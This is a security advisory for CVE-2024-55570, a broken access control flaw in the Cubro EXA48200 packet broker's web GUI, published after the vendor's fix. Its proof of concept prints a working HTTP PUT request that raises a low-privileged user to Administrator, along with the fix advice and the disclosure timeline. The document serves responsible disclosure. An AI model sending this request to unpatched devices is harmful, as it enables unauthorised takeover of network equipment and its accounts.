usd-2024-14 | Cubro EXA48200

Product: Cubro EXA48200 Web GUI
Affected Version: Build 20231025055018
Vulnerability Type: Broken Access Control
Security Risk: Critical
Vendor: Cubro Network Visibility
Vendor URL: https://www.cubro.com
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed in Firmware Version V5.0R14.5P4-V3.3R1
CVE number: CVE-2024-55570
CVE Link: https://www.cve.org/CVERecord?id=CVE-2024-55570
Advisory ID: usd-2024-14

Description

A broken access control vulnerability in the web GUI for the Cubro EXA48200 network packet broker (build no. 20231025055018) allows remote authenticated users of the application to increase their privileges to administrator by sending a single HTTP PUT request.

Proof of Concept

As seen in the following screenshot, the user pentester_usd has low privileges. No administrative functionality can be accessed in the sidebar.

By sending an HTTP PUT request to the regular API endpoint used for e.g. password change, the user can set the attribute rolename within the JSON in the request body to Administrator:

PUT /api/user/users HTTP/1.1
Host: 10.30.41.100
Cookie: str="2|1:0|10:1726492201|3:str|44:ODJkNjU3MDdkMWZmNmEwNGYxNWZhMTQxZDA0ZmIzOTY=|c975395bdca560bb788ba7ecdbbe70ec379bd8a3d7cb32f1f3cf23ee744812c9"
[...]
{ "pentester_usd":{ "auth_mode":"local", "password":"<REDACTED>", "rolename":"Administrator" }}

As the following screenshot shows, the user now has full administrative capabilities. This includes the ability to modify the passwords of all other user accounts, enabling a full compromise of the web application.

Fix

It is recommended to check user privileges server-side for every request that modifies data. It is not sufficient to simply not display sensitive functionality (such as a role change) within the GUI.

References

Timeline

  • 2024-09-23: Vulnerability identified by Tim Wörner of usd AG.
  • 2024-10-04: Initial contact request sent to Cubro's support team.
  • 2024-10-07: The vulnerability is disclosed via Cubro's technical support platform.
  • 2024-11-04: The vulnerability is patched in Firmware V5.0R14.5P4-V3.3R1
  • 2025-02-26: This advisory is published.

 

 

Credits

This security vulnerability was identified by Tim Wörner of usd AG.